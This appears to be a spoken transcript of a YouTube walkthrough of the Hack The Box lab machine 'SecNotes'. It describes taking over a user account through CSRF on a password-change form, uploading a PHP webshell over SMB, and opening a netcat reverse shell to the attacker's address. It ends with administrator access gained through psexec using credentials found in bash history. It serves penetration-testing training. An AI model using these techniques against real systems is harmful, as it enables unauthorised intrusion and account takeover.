Hello YouTube. Today I'm going to be teaching you guys how to work through the machine from Hackbox called SecNotes. This is a medium rated Windows box, which I really like because it teaches you how to exploit a cross-site request forgery and how to look for this vulnerability. Then once you exploited the cross-site request forgery attack on the user, you'll be able to log in with their credentials onto an SMB server. And after that, we'll notice that we can upload files to it and access those files via the web HTTP web port. And then from there, privilege escalation is really straightforward. There is a bash link file, which if we execute, we can eventually look at the credentials for the user administrator, and then using ps-exec we can actually log in to the Windows machine as a user administrator. So to start off, I ran auto recon already on this machine to get a full Nmap scan, and the Nmap results come with 3 ports open: your typical HTTP port, your SMB port, and another HTTP port, which is 8808. So what I'm going to start first enumerating real quick is the SMB port, just to make sure I actually have access to it. So what I'm going to do is SMB map, attack H, and then the IP. And we see we get an authentication error. So there's no, so let's do null authentication, and it doesn't work. So what I'm going to do now is I will check port 80, and I'm also going to check port 8808. And while this is running, I can see that there is a login.php, which means this Windows machine is running PHP. And also you can double check by using Wapalizer. So we do see it is an IIS, so there's no XAMPP being executed, because XAMPP is used for Apache web servers on the Windows machine. But it is running PHP, which makes a lot of things easier in directory brute forcing, because we don't have to look for .asp files or ASPX. So in the meantime, what I'm going to be doing is I'm actually just going to run an ffscan in the background. That's just something I like to do while I do manual enumeration. And since I already done this machine before, ZSH already remembers my command. So we'll let this run. And in the meantime, I like to look at the source code just to see if there's any comments or anything that's hidden. And from here, we don't see anything that's hidden. We just see a login.php sending a request, a post request with a username. And then that's pretty much it. Or we can register an account. Okay. So another thing that I like to do is check the DOM. And I just see the same thing as the as the source code. So while I don't like to check directories while ffs is running, because that just makes the server go really slow, but actually it finished. So ffs just returns a bunch of 302s, which basically means that these directories would just redirect us to the login.php page, and the pages that actually request something is the register.php, login.php, and the other login.php. So what I'm going to do is I'm going to just test for regular credentials, admin, nothing. And it says no account found with that username. So there is a username enumeration. So let's do administrator. And then let's test for that. Nothing. So one thing that I have learned, and I strongly suggest, is anytime you have the ability to do a sign up now, do it, because this allows you to figure out how the web application works for a regular user. So I'm going to just create a test, and must have like 6 characters. So 1, 2, 3, 1, 2, 3. There we go. So test, 1, 2, 3, and now we're logged in. So again, it is always important to figure out the regular user's um, functionality within the web application. So I can see here the first thing is due to the GDPR, which is a standard for personal information, all users must delete any notes that contain personally identifiable information. And we do see a username and a host name. So this is interesting. So what I'm going to do is I added it to my Etsy host file right here because there could be some form of vhost routing going on. So we can double check. And no. So let's go HTTP. And we can log in again. Okay, but it says please contact Tyler. So we do have a username for Tyler. A user named Tyler, and then we can do new note, change password, sign out, contact us. So let's do a new note, and we can do testing. This is a test, and that's pretty. So it just creates a new note on here, nothing special. So we have a change password, and we can look here and we can say, let me send to burp, and let's do test. Okay, so so we can see from burp that it actually sends a post request change pass. But what's interesting about this is that usually whenever you have a change password on any regular web applications, there is a field to say, please type in your old password, right? Another thing that's standing out to me is that when it comes to these password changes, there's no cross-site request forgery token. So this is already telling me that there is a cross-site request forgery vulnerability that can be done here if and only if we can get the user, in this case Tyler, to click on a link that we send him and be able to automatically, without his knowing, update his password because there's no verification on that user. But another thing is that this is being sent as a post request. So another suggestion and another thing I learned was always make sure to check if we can submit post requests as get requests and get requests as post requests. So let's change this to a change request method to get. And it actually does work. So there was no 404 error, there's no errors here, which means we can send a get request. So this is something we should put on our notes. And then we have a contact us. So since this is being sent to Tyler, I'm gonna check real quick to see if Tyler does click any links or anything in that sort of nature. If this web application is actively touching the link, so I'm gonna put test.txt, and we can see. Just let me double check. I actually have my IP. And yes, so we can see actually that the user Tyler is actively clicking on the link. He is running PowerShell and he made a request. Okay, so we have an attack vector there. Another thing is we can check here. We see that we have a default Apache page. A Windows IIS server with the typical page. So I'm going to run ff on here as well, just to make sure that there isn't any vulnerabilities or anything hidden on this page as well. So we're letting that run in the background. So now what I can do for the time being is I'm going to create a malicious cross-site request forgery attack for this user. So I'm going to put 10.97, the IP, change underscore pass.php, and it is a get request. And I'm just going to copy all this. Password, test123, and submit it here. And then I'm going to do http://10.10.14.9 completed. So this is going to allow me to actually know that this worked. So we'll run this. In the meantime, we see that fup did not return anything, which means that page really doesn't have any attack vectors. So let's let that run and complete it, which means Tyler did click the link. So let's go sign out. We'll do Tyler test 1, 2, 3, and we're in. So the reason why a cross-site request forgery attack is very dangerous is because users most of the time will have their session cookies available that they can be easily exploited because sometimes you may not be able to log out, or you forget to log out of your application, but that cookie's still there. So an attacker can submit a malicious link to you with, for example, an iframe being hidden or an HTML document with an iframe that allows the application, the web request, to make that change. Think about the most basic example is the attacker knows you have a certain bank and you forget to log out. So your cookie's still there, your session's still active. So they can send you a web page, a phishing email. You click on it, and in the background, there's a GET request being made to your bank website, and they can transfer money out. So that is why there's cross-site request forgery tokens, which you should definitely keep an eye on, and they would be on the request page here. That prevents the application from doing that. So the reason why we were able to find out that this was vulnerable was because in the post request, again, there was no cross-site request forgery token, and there was no way to verify your old password. So it was automatically, hey, type in your new password, confirm your new password, great, there you go. So definitely that's something that I learned, something that was very interesting to understand how a cross-site request forgery attack would work. So now once we're inside the user Tyler's website or profile, we can see that there's just different instructions for like maybe sticky buns, years, and a new site. So this right here looks like SMB directory, and we do have a password here. So since from experience, I've come to realize that this right here just starts looking like SMB, I can check out the SMB again using Tyler's credentials. Plus, it's always good to make sure that you check because users love password reuse. It's one of the most common vulnerabilities out there. And in fact, we do see that we actually have access. So and new site, we have read and write. So let's go here and check out new site and see what's in there. And from looking at this, we can tell that this is connected to the 88.88.8808, sorry, I can't speak, web port, which because it has the IIS start PNG. So we can execute scripts and execute files by accessing that web request. So what I'm going to do is I'm just going to create a PHP web request and just PHP system request. Now you might be asking why not get or post request, because the request allows us to make it either both post or get. It's just a lot easier. So definitely I recommend you guys remember this because it will come in handy whenever you're trying to test applications or hacking. So now I'm going to do SMB client, Tyler, and I'm inside. So now what I'm going to do is I'm going to put shell.php, and we can go here and see. So here you get a 500 internal server error, but it doesn't mean that the application's failing. So what we can do is let's send a Windows command, and we do get a user. So what I'm going to do now is get a reverse shell. So typically I would have gotten a reverse shell by just downloading an application and then running it. But because we can actually execute, upload files, I'm just going to upload a Netcat reverse shell. So netcat.exe, sudo netcat 443, and now I can just do netcat.exe 10.10.14.9, my IP address, and 404. So when I did this, I was wondering what was going on. So what happens is that the application, there's a script on here that is actually removing my scripts, my uploaded files. So you will have to just upload this occasionally, unless you already have a shell like I do. This will start, once you have a shell, you won't have to worry about that. So now we're inside the machine, and we are, who am I? We're the user Tyler, so we can go to the users directory, so c-that, dir users, Tyler, dir cd desktop, and we have the user flag. So now the privilege escalation part is when you look at everything that's given to you, and please be careful, make sure you look at all the details. We see that there's this bash link file. So this link file is basically saying that this bash file right here is linking, kind of like how you would have like dev null on a bash history file, being linked to something else. So what we can do is we can actually just see what it's linking to. So we can see here that when you type this command in, it's going to execute bash exe that's located in Windows System 32. So what I'm going to do is let's go to the Windows System 32, Windows System 32, and let's see if this is in here. So we'll just go up, and we don't see bash.exe. So if you executed that bash file, it would not execute, it would just freeze because the file is not there. So another thing is that we can use the where command. Where is kind of like the find command in Linux that allows us to search everything in the root directory for the word bash.exe. So where -r for recursive, c colon the root directory and the name of the file, which is bash.exe. So now this is going to see if there is a bash.exe file in the whole system. So just give it a time. And there is. So the bash.exe file was moved from the Windows System 32 directory to this one. So what we can do is we can just execute this. And we have root. So let's do Python tech. Let's do which Python tech c just to get a tty. Python tech c import pty dot spawn bin-bash. There we go. So now we're root. So let's go to the root directory then. And we don't see any root flags or anything. So let me check. So we are in the IP, but it seems that this bash exe file runs you in a VM because we're in an isolated environment, just because on the, if you look at the ls.la, there's really nothing that gives us indication that we're in a Windows machine now. So let's look at this file system, see what's in here since it is executable. And there's nothing here. So now another thing that's interesting is bash history is not empty, or it's not pointing to dev null. So my next, before I have to upload WinPs or anything, linps, I'm gonna check what this bash.history file does. And it has a lot of juicy information. We have, it goes to the mount directory, goes to users, pwd, make directory. So it is mounting a file system. And then we see that there is a username administrator and a password right here, which they're using for SMB client. And again, there is password reuse, so most likely, so we should always check that out. But in the same time, I want to double check this mount directory. And yeah, so this mount directory seems to be the one that we can access. So this is where the file, the Windows file is. So cd administrator. So yeah, so we can't access the administrator directory. So what I'm going to do now is I'm going to use ps-exec. So cd Windows program in packet examples, and I'm going to run ps-exec administrator with the password at 10.10.10.97. So ps-exec is a great tool if there is SMB open and if you have write access to it. Because administrator does have write access to it, this command will work. And as you can see, we do have access to the system as NT authority system. So we can now go to c:\users administrator desktop, and we have our root flag. And there you go. And that's the machine SecNotes. I know I did go a little fast compared to other videos. Definitely recommend you check out IPSec's video. It is a great tutorial to check. But the basic concept of this video and this machine is just to understand how to spot cross-site request forgery attacks and how to be able to better enumerate the machine, keeping your eyes open, taking your time, thinking of your process of enumeration, because anything that's not common on a Windows machine, for example, or any file system, that's probably something you should Google and check out what it does. And besides that, that is the machine. There is, if you look at other write-ups, there is another exploit for the unintended path, which is being able to exploit the SQL injection. That was an unintended path, but still something to practice if you are interested in learning more about SQL injections. But yeah, that was the machine. Thank you for watching, and I'll catch you on the next video.